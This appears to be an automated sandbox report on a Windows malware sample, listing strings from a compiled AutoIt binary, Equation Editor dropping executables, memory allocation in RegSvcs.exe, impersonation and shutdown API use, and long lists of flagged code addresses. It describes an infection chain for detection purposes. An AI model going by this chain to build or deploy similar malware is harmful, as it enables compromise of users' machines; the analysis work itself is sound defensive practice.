Source: name.exe.5.dr	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bd7c0de8-2

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\negrett.exe

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_0105D5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_01051201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	5_2_00B7E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	8_2_0105E8F6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	11_2_0139E8F6

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EA3AC	5_3_029EA3AC
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A061D9	5_3_02A061D9
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0794	5_3_029F0794
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D85C0	5_3_029D85C0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0B06	5_3_029F0B06
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029EAB31	5_3_029EAB31
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6E4A	5_3_029F6E4A
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F6C1B	5_3_029F6C1B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F0DB0	5_3_029F0DB0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D6D20	5_3_029D6D20
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029E8D7D	5_3_029E8D7D
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A092EE	5_3_02A092EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A5B244	5_3_02A5B244
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1332	5_3_029F1332
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DB340	5_3_029DB340
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F70A7	5_3_029F70A7
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F1077	5_3_029F1077
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A37698	5_3_02A37698
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A41446	5_3_02A41446
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029D7460	5_3_029D7460
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A05B6B	5_3_02A05B6B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A0D8FF	5_3_02A0D8FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029FBEA0	5_3_029FBEA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029DBEF0	5_3_029DBEF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_02A63C73	5_3_02A63C73
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B18060	5_2_00B18060
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B82046	5_2_00B82046
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B78298	5_2_00B78298
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4E4FF	5_2_00B4E4FF
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4676B	5_2_00B4676B
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00BA4873	5_2_00BA4873
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3CAA0	5_2_00B3CAA0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B1CAF0	5_2_00B1CAF0
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B2CC39	5_2_00B2CC39
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B46DD9	5_2_00B46DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF8060	8_2_00FF8060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01062046	8_2_01062046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01058298	8_2_01058298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102E4FF	8_2_0102E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102676B	8_2_0102676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01084873	8_2_01084873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FFCAF0	8_2_00FFCAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101CAA0	8_2_0101CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01026DD9	8_2_01026DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100CC39	8_2_0100CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100B119	8_2_0100B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF91C0	8_2_00FF91C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011394	8_2_01011394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011706	8_2_01011706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0100997D	8_2_0100997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010119B0	8_2_010119B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101781B	8_2_0101781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00FF7920	8_2_00FF7920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017A4A	8_2_01017A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011C77	8_2_01011C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01017CA7	8_2_01017CA7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01011F32	8_2_01011F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0107BE44	8_2_0107BE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01029EEE	8_2_01029EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001936F0	8_2_001936F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1560	9_2_003D1560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D1551	9_2_003D1551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12B0	9_2_003D12B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_003D12C0	9_2_003D12C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828F0	9_2_00A828F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82020	9_2_00A82020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8741A	9_2_00A8741A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A86858	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8BDE1	9_2_00A8BDE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D30	9_2_00A81D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A84AB8	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8828A	9_2_00A8828A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A856D8	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82600	9_2_00A82600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81A40	9_2_00A81A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FE0	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BE0	9_2_00A82BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B720	9_2_00A8B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82310	9_2_00A82310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F48	9_2_00A80F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A828E4	9_2_00A828E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82010	9_2_00A82010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A825F1	9_2_00A825F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A81D20	9_2_00A81D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F6D1	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8EE21	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8F279	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85FA4	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF89	9_2_00A8AF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8AF98	9_2_00A8AF98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A863F8	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82BD0	9_2_00A82BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A83FD4	9_2_00A83FD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8FB29	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A80F39	9_2_00A80F39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A82300	9_2_00A82300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A8B71F	9_2_00A8B71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00A85B47	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6E0	9_2_00D2E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6E8	9_2_00D2C6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C080	9_2_00D2C080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D3A8	9_2_00D2D3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F3A8	9_2_00D2F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD48	9_2_00D2CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED48	9_2_00D2ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E078	9_2_00D2E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA10	9_2_00D2DA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24A18	9_2_00D24A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D265D0	9_2_00D265D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E6D0	9_2_00D2E6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABD8	9_2_00D2ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C6D8	9_2_00D2C6D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245C0	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D272C8	9_2_00D272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D208F0	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D288F0	9_2_00D288F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F7	9_2_00D215F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D215F8	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D222FF	9_2_00D222FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29EE0	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ABE8	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A790	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B497	9_2_00D2B497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2D39A	9_2_00D2D39A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20498	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B498	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2F398	9_2_00D2F398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2119F	9_2_00D2119F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25888	9_2_00D25888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BB0	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D291B0	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B7	9_2_00D238B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D238B8	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D245BF	9_2_00D245BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D211A0	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA7	9_2_00D21EA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21EA8	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D284A8	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22BAF	9_2_00D22BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A50	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22757	9_2_00D22757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22758	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D26258	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28D58	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2345F	9_2_00D2345F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20040	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B040	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2624A	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D20D48	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D21A4F	9_2_00D21A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2C076	9_2_00D2C076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D25878	9_2_00D25878
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23460	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29A60	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24167	9_2_00D24167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D24168	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2E068	9_2_00D2E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D10	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D22300	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28900	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2DA00	9_2_00D2DA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23007	9_2_00D23007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23008	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D29608	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D23D0F	9_2_00D23D0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2B031	9_2_00D2B031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2A338	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2CD38	9_2_00D2CD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D2ED38	9_2_00D2ED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00D28028	9_2_00D28028
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01338060	11_2_01338060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A2046	11_2_013A2046
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01398298	11_2_01398298
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136E4FF	11_2_0136E4FF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136676B	11_2_0136676B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013C4873	11_2_013C4873
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135CAA0	11_2_0135CAA0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0133CAF0	11_2_0133CAF0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01366DD9	11_2_01366DD9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134CC39	11_2_0134CC39
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134B119	11_2_0134B119
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013391C0	11_2_013391C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351394	11_2_01351394
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134120B	11_2_0134120B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351706	11_2_01351706
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01337920	11_2_01337920
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0134997D	11_2_0134997D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013519B0	11_2_013519B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135781B	11_2_0135781B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357A4A	11_2_01357A4A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351C77	11_2_01351C77
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01357CA7	11_2_01357CA7
